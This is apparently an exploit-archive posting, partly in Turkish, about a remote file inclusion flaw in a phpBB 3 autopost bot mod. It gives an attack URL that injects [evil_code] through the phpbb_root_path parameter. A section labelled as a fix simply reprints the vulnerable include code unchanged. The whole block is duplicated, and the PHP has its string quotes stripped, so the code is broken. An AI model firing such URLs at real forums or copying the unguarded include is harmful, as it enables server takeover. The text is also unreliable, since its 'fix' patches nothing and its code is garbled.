- 26 Ara 2011
- 11,500
- 12,865
phpBB 3 (autopost bot mod = 0.1.3) Remote File Include Vulnerability
Bug :
victim.com/forum_path/includes/functions_lastrss_autopost.php?config[lastrss_ap_enabled]=1&phpbb_root_path=[evil_code]
F i X :
includes/functions_lastrss_autopost.php açın ve 204-240 satırlarının arasını değiştirin..
if($config[lastrss_ap_enabled]) <-----{1}
{
// init & setup lastrss
// $rss can be already initiated by lastRSS agregator mod by SmiX
if(!isset($rss)) <-----{2}
{
require $phpbb_root_path . includes/class_lastrss. . $phpEx; <-----{3}
$rss = new lastrss;
}
// init/change settings for lastrss autopost bot
$rss->cache_time = 0; // not used in this mod
$rss->items_limit = $config[lastrss_ap_items_limit]; // default limit of items to post
$rss->type = $config[lastrss_type]; // connection type (fopen / curl)
// init lastRSS autopost MOD !
// check if we have some feeds in database to check
$sql = SELECT *
FROM . LASTRSS_AP_TABLE .
WHERE next_check < " . time() . " AND enabled = "1";
$result = $db->sql_query($sql);
$row = $db->sql_fetchrow($result);
$db->sql_freeresult($result);
// so do we have some feeds to post ?
if(sizeof($row) > 0)
{
// we are already sure, that at least one feed exists!
$feed = get_next_feed_to_post();
}
// do we have some feed data ?
if (isset($feed) && (sizeof($feed) > 0))
{
// we are sure, we have feed info for checking the feed!
autopost_init($feed);
}
}
?>
******************************************************
Bug :
victim.com/forum_path/includes/functions_lastrss_autopost.php?config[lastrss_ap_enabled]=1&phpbb_root_path=[evil_code]
F i X :
includes/functions_lastrss_autopost.php açın ve 204-240 satırlarının arasını değiştirin..
if($config[lastrss_ap_enabled]) <-----{1}
{
// init & setup lastrss
// $rss can be already initiated by lastRSS agregator mod by SmiX
if(!isset($rss)) <-----{2}
{
require $phpbb_root_path . includes/class_lastrss. . $phpEx; <-----{3}
$rss = new lastrss;
}
// init/change settings for lastrss autopost bot
$rss->cache_time = 0; // not used in this mod
$rss->items_limit = $config[lastrss_ap_items_limit]; // default limit of items to post
$rss->type = $config[lastrss_type]; // connection type (fopen / curl)
// init lastRSS autopost MOD !
// check if we have some feeds in database to check
$sql = SELECT *
FROM . LASTRSS_AP_TABLE .
WHERE next_check < " . time() . " AND enabled = "1";
$result = $db->sql_query($sql);
$row = $db->sql_fetchrow($result);
$db->sql_freeresult($result);
// so do we have some feeds to post ?
if(sizeof($row) > 0)
{
// we are already sure, that at least one feed exists!
$feed = get_next_feed_to_post();
}
// do we have some feed data ?
if (isset($feed) && (sizeof($feed) > 0))
{
// we are sure, we have feed info for checking the feed!
autopost_init($feed);
}
}
?>
******************************************************
